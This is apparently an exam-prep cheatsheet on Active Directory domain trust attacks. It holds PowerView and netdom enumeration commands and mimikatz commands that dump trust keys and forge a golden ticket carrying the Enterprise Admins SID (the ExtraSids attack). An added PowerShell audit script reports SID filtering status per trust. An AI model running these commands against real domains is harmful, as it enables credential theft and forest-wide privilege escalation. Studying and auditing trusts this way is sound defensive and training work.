Domain Trust Attacks
Overview
Exploiting trust relationships between domains and forests.
Cheatsheet
Enumerate Trusts
# PowerView
Get-DomainTrust          # Enumerate trusts
Get-DomainTrustMapping   # Map trust relationships
# Netdom
netdom trust /domain:target.local   # Enumerate trusts via native tool
Trust Types
- Parent-Child: Automatic, transitive
- Forest: Between forests
- External: Non-transitive
SID History Injection
# Get trust key
mimikatz: lsadump::trust /patch   # Dump trust keys
# Create Golden Ticket with SID History
mimikatz: kerberos::golden /user:admin /domain:child.local /sid:S-1-5-21-... /sids:S-1-5-21-...-519 /krbtgt:HASH /ptt   # Forge inter-realm ticket with Enterprise Admin SID
ExtraSids Attack
# Add the Enterprise Admins SID to the ticket with /sids:S-1-5-21-parent-519 (the SID History injection payload)
Common Pitfalls
- Trust direction matters for attack path
- SID filtering can block attacks
- Need to compromise child domain first
Exam Survival Tips
- Map all trusts with BloodHound
- Check for SID filtering status
- Parent-child trusts are exploitable by default
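Added audit script (not part of the original cheatsheet) for the "check SID filtering status" tip above: it decodes the trustAttributes flags defined in MS-ADTS and reports, per trust, whether SID filtering is enforced, so trusts that would accept injected SID history stand out in a review. It assumes the RSAT ActiveDirectory module is installed and that the caller can read trustedDomain objects.

```powershell
# Added audit example, not from the original cheatsheet. Decodes the
# trustAttributes bits from MS-ADTS and reports whether SID filtering is
# enforced on each trust. Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# MS-ADTS trustAttributes bit flags
$TA_NON_TRANSITIVE    = 0x01
$TA_QUARANTINED       = 0x04   # SID filtering enforced on an external trust
$TA_FOREST_TRANSITIVE = 0x08
$TA_CROSS_ORG         = 0x10   # selective authentication
$TA_WITHIN_FOREST     = 0x20   # parent-child / tree-root trust
$TA_TREAT_AS_EXTERNAL = 0x40   # forest trust with SID history allowed

function Get-TrustSidFilteringState {
    param([Parameter(Mandatory)][int]$TrustAttributes)
    if ($TrustAttributes -band $TA_WITHIN_FOREST) {
        return 'Intra-forest: no SID filtering by default'
    }
    if ($TrustAttributes -band $TA_FOREST_TRANSITIVE) {
        if ($TrustAttributes -band $TA_TREAT_AS_EXTERNAL) {
            return 'Forest trust: SID history ENABLED (filtering relaxed)'
        }
        return 'Forest trust: SID filtering enforced'
    }
    if ($TrustAttributes -band $TA_QUARANTINED) {
        return 'External trust: SID filtering (quarantine) enforced'
    }
    return 'External trust: SID filtering NOT enforced'
}

function Get-TrustSidFilteringReport {
    param([string]$Server)   # optional DC to query
    $query = @{ Filter = '*'; Properties = 'trustAttributes' }
    if ($Server) { $query['Server'] = $Server }
    Get-ADTrust @query | ForEach-Object {
        [pscustomobject]@{
            Trust         = $_.Name
            Direction     = $_.Direction
            Transitive    = -not ($_.TrustAttributes -band $TA_NON_TRANSITIVE)
            SelectiveAuth = [bool]($_.TrustAttributes -band $TA_CROSS_ORG)
            SidFiltering  = Get-TrustSidFilteringState -TrustAttributes $_.TrustAttributes
        }
    }
}

Get-TrustSidFilteringReport | Format-Table -AutoSize
```

Any row reporting "NOT enforced" or "SID history ENABLED" is a trust where the SID History techniques on this page would not be blocked and should be reviewed against the netdom /quarantine and /enablesidhistory settings.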